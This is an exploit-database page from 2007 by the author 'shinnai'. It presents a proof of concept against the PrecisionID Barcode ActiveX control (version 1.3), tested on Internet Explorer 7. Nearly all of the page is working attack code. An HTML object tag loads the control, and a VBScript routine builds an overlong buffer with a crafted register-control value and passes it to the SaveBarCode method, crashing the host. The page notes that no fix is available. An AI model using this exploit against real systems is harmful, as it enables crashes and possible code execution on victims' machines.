PrecisionID Barcode ActiveX 1.3 Denial of Service Exploit

2007-05-12 00:00:00

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/12</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
<b>PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denail of Service</b>
url: http://www.precisionid.com/

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
--------------------------------------------------------------------------------

<object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
buff=String(304,"B")

get_eax = unescape("%D1%60%61%61")

buff2 = String(709,"C")

egg = buff + get_eax + buff2

test.SaveBarCode egg
End Sub
</script>
</span></span>
</code></pre>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.